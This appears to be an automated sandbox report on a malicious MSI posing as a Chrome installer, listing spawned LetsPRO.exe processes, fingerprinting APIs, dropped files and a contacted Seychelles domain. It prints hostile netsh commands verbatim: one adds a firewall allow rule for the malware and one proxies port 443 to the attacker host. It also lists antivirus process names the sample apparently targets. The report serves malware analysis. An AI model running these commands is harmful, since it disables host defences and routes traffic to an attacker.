Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files (x86)\ChromeSetup.exe Process created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe c:\windows\systemtemp\gumbc12.tmp\googleupdate.exe /installsource taggedmi /install "appguid={8a69d345-d564-463c-aff1-a69d9e530f96}&iid={852d075a-cb9d-6360-4e4d-427bbb4f11e1}&lang=zh-cn&browser=3&usagestats=1&appname=google%20chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
Source: C:\Program Files (x86)\ChromeSetup.exe Process created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe c:\windows\systemtemp\gumbc12.tmp\googleupdate.exe /installsource taggedmi /install "appguid={8a69d345-d564-463c-aff1-a69d9e530f96}&iid={852d075a-cb9d-6360-4e4d-427bbb4f11e1}&lang=zh-cn&browser=3&usagestats=1&appname=google%20chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" Jump to behavior
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC97C7F GetSecurityDescriptorDacl,SetSecurityDescriptorDacl, 30_2_6CC97C7F
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA3BF4 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 30_2_6CCA3BF4
Source: LetsPRO.exe, 00000004.00000003.2865605230.0000000005023000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2865471845.0000000005023000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0 minProgram Manager
Source: LetsPRO.exe, 00000004.00000002.3274006003.0000000005023000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: inProgram Manager
Source: LetsPRO.exe, 00000004.00000003.3238092510.0000000005023000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.3043194092.0000000005023000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0 minProgram Managert
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00258C8B cpuid 8_2_00258C8B
Contains functionality to query locales information (e.g. system language)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW, 4_2_03F35430
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson, 5_2_6C9088CA
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,free,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,_malloc_crt,_malloc_crt,free,__recalloc_crt,__recalloc_crt,_strlen,_calloc_crt,_strlen,strcpy_s,SetEnvironmentVariableA,_errno,free,free,__invoke_watson, 5_2_6C9084A8
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP, 5_2_6C9085EC
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno, 5_2_6C906630
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc, 5_2_6C90875C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 5_2_6C97F4C7
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,_stricmp,_TestDefaultLanguage, 5_2_6C97F407
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 5_2_6C97F52E
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 5_2_6C97F1DB
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp, 5_2_6C97F134
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,_strlen,GetLocaleInfoA,_stricmp,_strlen,_stricmp,_TestDefaultLanguage, 5_2_6C97F236
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: EnumSystemLocalesW, 8_2_00268096
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: EnumSystemLocalesW, 8_2_002680E1
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: EnumSystemLocalesW, 8_2_0026817C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetLocaleInfoW, 8_2_0026219D
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 8_2_00268207
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetLocaleInfoW, 8_2_0026845C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: EnumSystemLocalesW, 8_2_00261CFD
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_00268584
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 8_2_00267DF0
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetLocaleInfoW, 8_2_0026868C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_0026875F
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: EnumSystemLocalesW, 30_2_6CDEECFD
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 30_2_6CDF68F6
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetLocaleInfoW, 30_2_6CDF69FC
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 30_2_6CDF6ACB
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: EnumSystemLocalesW, 30_2_6CDF64EF
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: EnumSystemLocalesW, 30_2_6CDF6454
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: EnumSystemLocalesW, 30_2_6CDF6409
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 30_2_6CDF657A
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetLocaleInfoW, 30_2_6CDF67CD
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 30_2_6CDF6167
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetLocaleInfoW, 30_2_6CDF6362
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetLocaleInfoW, 30_2_6CDEF27A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_025FB63F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 4_2_025FB63F
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F45D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache, 4_2_03F45D22
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F36A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW, 4_2_03F36A70
Source: C:\Windows\System32\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies the windows firewall
Source: unknown Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
Uses netsh to modify the Windows network and firewall settings
Source: unknown Process created: C:\Windows\System32\netsh.exe netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443
AV process strings found (often used to terminate AV products)
Source: LetsPRO.exe Binary or memory string: acs.exe
Source: LetsPRO.exe Binary or memory string: vsserv.exe
Source: LetsPRO.exe Binary or memory string: kxetray.exe
Source: LetsPRO.exe Binary or memory string: avcenter.exe
Source: LetsPRO.exe Binary or memory string: KSafeTray.exe
Source: LetsPRO.exe Binary or memory string: cfp.exe
Source: LetsPRO.exe Binary or memory string: avp.exe
Source: LetsPRO.exe, LetsPRO.exe, 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 360Safe.exe
Source: LetsPRO.exe Binary or memory string: rtvscan.exe
Source: LetsPRO.exe, LetsPRO.exe, 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 360tray.exe
Source: LetsPRO.exe Binary or memory string: ashDisp.exe
Source: LetsPRO.exe Binary or memory string: TMBMSRV.exe
Source: LetsPRO.exe, LetsPRO.exe, 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 360Tray.exe
Source: LetsPRO.exe Binary or memory string: avgwdsvc.exe
Source: LetsPRO.exe Binary or memory string: AYAgent.aye
Source: LetsPRO.exe Binary or memory string: QUHLPSVC.EXE
Source: LetsPRO.exe Binary or memory string: RavMonD.exe
Source: LetsPRO.exe Binary or memory string: Mcshield.exe
Source: LetsPRO.exe Binary or memory string: K7TSecurity.exe
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432094 Sample: sutup-Chrome.13.26.x64.msi Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 79 156.248.54.11.webcamcn.xyz 2->79 91 Malicious sample detected (through community Yara rule) 2->91 93 Antivirus detection for dropped file 2->93 95 Multi AV Scanner detection for dropped file 2->95 99 12 other signatures 2->99 8 msiexec.exe 15 49 2->8         started        11 LetsPRO.exe 2->11         started        13 netsh.exe 2->13         started        16 12 other processes 2->16 signatures3 97 Performs DNS queries to domains with low reputation 79->97 process4 file5 71 C:\Windows\Installer\MSIB5FB.tmp, PE32 8->71 dropped 73 C:\Windows\Installer\MSIB59C.tmp, PE32 8->73 dropped 75 C:\Windows\Installer\MSIB54D.tmp, PE32 8->75 dropped 77 11 other malicious files 8->77 dropped 18 ChromeSetup.exe 73 8->18         started        22 LetsPRO.exe 5 6 8->22         started        25 LetsPRO.exe 8->25         started        31 15 other processes 8->31 27 LetsPRO.exe 11->27         started        107 Creates files in the system32 config directory 13->107 29 cscript.exe 16->29         started        signatures6 process7 dnsIp8 57 C:\Windows\SystemTemp\...\psuser_64.dll, PE32+ 18->57 dropped 59 C:\Windows\SystemTemp\...\psuser.dll, PE32 18->59 dropped 61 C:\Windows\SystemTemp\...\psmachine_64.dll, PE32+ 18->61 dropped 69 65 other malicious files 18->69 dropped 101 Drops executables to the windows directory (C:\Windows) and starts them 18->101 33 GoogleUpdate.exe 18->33         started        81 156.248.54.11.webcamcn.xyz 156.248.54.11, 443, 49716, 49717 Africa-on-Cloud-ASZA Seychelles 22->81 83 127.0.0.1 unknown unknown 22->83 63 C:\Users\user\99944\LetsPRO.exe, PE32 22->63 dropped 65 C:\Users\user\99944\144977.vbs, ASCII 22->65 dropped 67 C:\Users\user\99944\1, data 22->67 dropped 103 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 22->103 105 Hides threads from debuggers 22->105 37 LetsPRO.exe 25->37         started        39 conhost.exe 29->39         started        41 LetsPRO.exe 31->41         started        43 LetsPRO.exe 31->43         started        45 LetsPRO.exe 31->45         started        47 4 other processes 31->47 file9 signatures10 process11 file12 49 C:\Program Files (x86)\...behaviorgraphoogleUpdate.exe, PE32 33->49 dropped 51 C:\Program Files (x86)\...\psuser_64.dll, PE32+ 33->51 dropped 53 C:\Program Files (x86)behaviorgraphoogle\...\psuser.dll, PE32 33->53 dropped 55 65 other malicious files 33->55 dropped 85 Found evasive API chain checking for user administrative privileges 33->85 87 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 41->87 89 Hides threads from debuggers 41->89 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
156.248.54.11
 156.248.54.11.webcamcn.xyz Seychelles
328608 Africa-on-Cloud-ASZA true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
156.248.54.11.webcamcn.xyz 156.248.54.11 true